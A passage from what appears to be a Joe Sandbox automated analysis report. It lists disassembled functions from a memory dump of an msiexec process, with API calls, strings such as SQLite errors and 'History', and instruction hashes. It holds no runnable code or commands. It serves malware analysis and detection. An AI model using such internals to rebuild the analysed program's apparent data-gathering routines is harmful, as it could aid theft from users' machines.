                                                                            • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                            • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastMessage_snwprintf
                                                                            • String ID: Error$Error %d: %s
                                                                            • API String ID: 313946961-1552265934
                                                                            • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                            • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                            • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                            • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: foreign key constraint failed$new$oid$old
                                                                            • API String ID: 0-1953309616
                                                                            • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                            • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                            • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                            • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                            APIs
                                                                            Strings
                                                                            • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                            • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                            • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy
                                                                            • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                            • API String ID: 3510742995-272990098
                                                                            • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                            • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                            • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                            • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                            APIs
                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                              • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                            • memset.MSVCRT ref: 0040C439
                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                            • _wcsupr.MSVCRT ref: 0040C481
                                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                            • memset.MSVCRT ref: 0040C4D0
                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: free$EnumValuememset$_wcsuprmemcpywcslen
                                                                            • String ID:
                                                                            • API String ID: 1265369119-0
                                                                            • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                            • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                            • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                            • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0044A6EB
                                                                            • memset.MSVCRT ref: 0044A6FB
                                                                            • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                            • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpymemset
                                                                            • String ID: gj
                                                                            • API String ID: 1297977491-4203073231
                                                                            • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                            • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                            • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                            • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                            APIs
                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                            • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                            • free.MSVCRT ref: 0040E9D3
                                                                              • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@$free
                                                                            • String ID:
                                                                            • API String ID: 2241099983-0
                                                                            • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                            • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                            • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                            • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                            APIs
                                                                            • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                            • malloc.MSVCRT ref: 004174BD
                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                            • free.MSVCRT ref: 004174E4
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                            • String ID:
                                                                            • API String ID: 4053608372-0
                                                                            • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                            • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                            • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                            • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                            APIs
                                                                            • GetParent.USER32(?), ref: 0040D453
                                                                            • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                            • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                            • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Rect$ClientParentPoints
                                                                            • String ID:
                                                                            • API String ID: 4247780290-0
                                                                            • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                            • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                            • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                            • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                            APIs
                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                            • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                            • memset.MSVCRT ref: 004450CD
                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                              • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                            • String ID:
                                                                            • API String ID: 1471605966-0
                                                                            • Opcode ID: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                                            • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                            • Opcode Fuzzy Hash: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                                            • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                            APIs
                                                                            • wcscpy.MSVCRT ref: 0044475F
                                                                            • wcscat.MSVCRT ref: 0044476E
                                                                            • wcscat.MSVCRT ref: 0044477F
                                                                            • wcscat.MSVCRT ref: 0044478E
                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                              • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                              • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                            • String ID: \StringFileInfo\
                                                                            • API String ID: 102104167-2245444037
                                                                            • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                            • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                            • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                            • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                            APIs
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@
                                                                            • String ID:
                                                                            • API String ID: 613200358-0
                                                                            • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                            • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                            • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                            • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _memicmpwcslen
                                                                            • String ID: @@@@$History
                                                                            • API String ID: 1872909662-685208920
                                                                            • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                            • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                            • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                            • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004100FB
                                                                            • memset.MSVCRT ref: 00410112
                                                                              • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                              • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                            • _snwprintf.MSVCRT ref: 00410141
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                            • String ID: </%s>
                                                                            • API String ID: 3400436232-259020660
                                                                            • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                            • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                            • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                            • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040D58D
                                                                            • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                            • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ChildEnumTextWindowWindowsmemset
                                                                            • String ID: caption
                                                                            • API String ID: 1523050162-4135340389
                                                                            • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                            • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                            • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                            • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                            APIs
                                                                              • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                              • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                            • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                            • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                            • String ID: MS Sans Serif
                                                                            • API String ID: 210187428-168460110
                                                                            • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                            • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                            • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                            • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ClassName_wcsicmpmemset
                                                                            • String ID: edit
                                                                            • API String ID: 2747424523-2167791130
                                                                            • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                            • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                            • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                            • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                            APIs
                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                            • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                            • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                            • String ID: SHAutoComplete$shlwapi.dll
                                                                            • API String ID: 3150196962-1506664499
                                                                            • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                            • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                            • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                            • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                            APIs
                                                                            • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                            • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                            • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                            • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                            • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$memcmp
                                                                            • String ID:
                                                                            • API String ID: 3384217055-0
                                                                            • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                            • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                            • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                            • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$memcpy
                                                                            • String ID:
                                                                            • API String ID: 368790112-0
                                                                            • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                            • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                            • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                            • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                            APIs
                                                                              • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                              • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                              • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                              • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                              • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                            • GetMenu.USER32(?), ref: 00410F8D
                                                                            • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                            • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                            • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                            • String ID:
                                                                            • API String ID: 1889144086-0
                                                                            • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                            • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                            • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                            • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                            APIs
                                                                            • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                            • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                            • GetLastError.KERNEL32 ref: 0041810A
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                            • String ID:
                                                                            • API String ID: 1661045500-0
                                                                            • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                            • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                            • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                            • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                            APIs
                                                                              • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                            • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                            Strings
                                                                            • virtual tables may not be altered, xrefs: 0042EBD2
                                                                            • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                            • Cannot add a column to a view, xrefs: 0042EBE8
                                                                            Memory Dump Source
